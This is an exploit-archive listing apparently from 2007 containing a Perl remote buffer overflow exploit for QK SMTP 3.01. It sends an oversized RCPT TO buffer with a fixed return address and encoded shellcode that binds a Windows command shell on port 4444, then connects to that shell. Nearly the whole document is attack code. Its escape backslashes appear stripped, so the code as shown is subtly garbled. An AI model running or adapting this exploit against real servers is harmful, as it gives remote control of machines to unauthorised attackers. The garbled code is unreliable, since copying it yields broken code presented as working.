QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl)
# Published : 2007-01-01
# Author : Jacopo Cervini
# Previous Title : Apple Quicktime (rtsp URL Handler) Stack Buffer Overflow Exploit
# Next Title : WinZIP 10.0 FileView ActiveX Controls Remote Overflow Exploit

#!/bin/perl
#
#http://www.securityfocus.com/bid/20681
#
#	tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal
# bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit
# credit to Greg Linares for discovered the vulnerability
# thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool
# Jacopo Cervini aka acaro [at] jervus.it


if (@ARGV < 1) {
print "--------------------------------------------------------------------n";
print "Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress n";
print " Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 n";
print "--------------------------------------------------------------------n";
}



use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
#my $eip="x43x43x43x43";	

my $eip="x8fx29x46x00";	#call esp in QKSmtpServer3.exe



$sc=
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ".
"BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP".
"44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM".
"pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo".
"6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r".
"7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm".
"PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk".
"OvpOxhp1zitOonsKOyFKO6pA";


$jmpback = "x50x73".
"x54x73".
"x58x73".
"xb0".
"x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"xb0x48x73".
"x40x73".
"x40x73".
"x40x73".
"x40x73".
"x40x73".
"x40x73".
"x40x73".
"x50x73".
"xc3x73";

my $buffer =("x41"x296).$eip.("x73"x2228).$sc.("x45"x820).$jmpback."x00";



my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;


$request = "helo acaro" . "rn";
send $socket, $request, 0;
print "[+] Sent helo requestn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "mail from: acaro@peaceandlove.peace" . "rn";
send $socket, $request, 0;
print "[+] Sent mail from requestn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "rcpt to: " . $buffer . "rn";
send $socket, $request, 0;
print "[+] Sent rcpt to requestn";



print " + connect on 4444 port of $host ...n";
sleep(3);
system("telnet $host 4444");
exit;

# www.Syue.com [2007-01-01]